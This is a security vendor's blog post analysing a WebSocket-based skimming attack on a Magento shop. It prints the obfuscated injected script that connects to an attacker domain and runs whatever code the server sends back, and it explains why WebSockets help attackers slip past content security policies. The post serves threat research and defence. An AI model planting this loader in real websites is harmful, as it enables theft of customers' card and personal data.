Linkedin Tag

Back to blog

New TTPs in Stealing PII and Financial Information from Magento Websites

Monday, October 14th, 2024

Updated December 5th, 2024

M

Marketing

At c/side, we actively monitor client-side supply chain attacks, with a focus on the evolving tactics, techniques, and procedures (TTPs) used by threat actors.

One of the most common attacks we've observed over the past few months is the targeting of eCommerce websites built on the Magento framework.

In particular, we've been closely following the Cosmic Sting attack (CVE-2024-34102), which has been widely reported, including by Sansec (https://sansec.io/research/cosmicsting).

Recent TTP Observed Traditionally, these attacks have involved the injection of third-party JavaScript (JS) to create an overlay that steals credit card (CC) information and exfiltrates sensitive data.

However, just yesterday (Sunday 13th of October), we observed a novel and intriguing TTP in which the attacker took a different approach.

Instead of directly loading malicious JavaScript into the Magento site, they established a WebSocket connection to communicate with a third-party server. This attack targeted the website sosessentials.co.uk, which runs on Magento 2.4 (Community).

During our investigation, we found the following injected script on the compromised site:

<script> 
const qbq = [93,89,89,16,5,5,77,89,94,75,94,70,73,4,69,88,77,5,64,67,92,69,21,89,69,95,88,73,79,23];
const zep = 42; 
window.sss = new WebSocket(String.fromCharCode(...qbq.map(hwo => hwo ^ zep)) + encodeURIComponent(location.href));
window.sss.addEventListener('message', event => {new Function(event.data)()}); 
</script>

Upon decoding this obfuscated script, we discovered that it establishes a WebSocket connection to the following URL: `wss://gstatlc[.]org/jivo?source=`.

At the time of analysis, we were unable to retrieve a response from the remote server, but based on the attack patterns we've observed, we believe this connection was likely intended for web skimming purposes, i.e., stealing customer data such as credit card information. Details of the Domain The remote website, gstatlc.org, was created just three days ago, which is a clear red flag that this domain is likely part of the attacker's infrastructure.

Here are the relevant domain details:

  • Created on: 2024-10-11
  • Expires on: 2025-10-11
  • Updated on: 2024-10-11

The New Trend: WebSockets for Skimming This attack presents an interesting evolution in TTPs, especially as more security vendors begin detecting common JavaScript injection attacks.

Instead of simply loading malicious JavaScript over HTTP, the attacker established a WebSocket connection (WSS protocol) to load scripts and possibly other data remotely. This adds complexity to the attack, as WebSockets provide real-time, bi-directional communication that can be harder to detect and inspect than regular HTTP requests.

Why WebSockets?

Some intriguing aspects of using WebSockets (WSS) for attacks include:

Real-time communication: WebSockets allow for continuous, bidirectional communication between the client and the remote server, making it easier to exfiltrate data or modify scripts on the fly. Bypassing traditional defenses: Many web defenses and content security policies (CSPs) are focused on blocking HTTP-based resource loads.

WebSockets, using the WSS protocol, may evade detection if not properly monitored. Less reliance on page reloads: Unlike traditional methods where attackers would rely on injecting scripts to steal data during page loads or interactions, WebSockets enable continuous monitoring and exfiltration of sensitive data without relying on the user reloading or navigating away from the page.

The c/side Approach to Client-Side Protection

At c/side, we take an active role in protecting our users from evolving client-side threats like the one described above. One of the key strategies we employ is proxying JavaScript files for analysis. By doing this, we can intercept and inspect JavaScript files that websites attempt to load from remote servers, ensuring they are safe and free from malicious content.

This approach has led to a 30% improvement in detecting and intercepting remote JavaScript files before they are executed in users' browsers. Importantly, our system ensures that no malicious JS is loaded, effectively preventing attacks such as credit card skimming and data exfiltration. 

Our focus on client-side activity monitoring ensures that c/side users are protected from these types of sophisticated attacks. We continuously monitor, analyze, and block harmful scripts before they can cause damage, providing an extra layer of security to our users and ensuring that their sensitive information remains safe.

By staying ahead of the curve and adapting to new TTPs, we ensure that our users are always one step ahead of attackers, safeguarding their online environments from threats like this WebSocket-based skimming attack.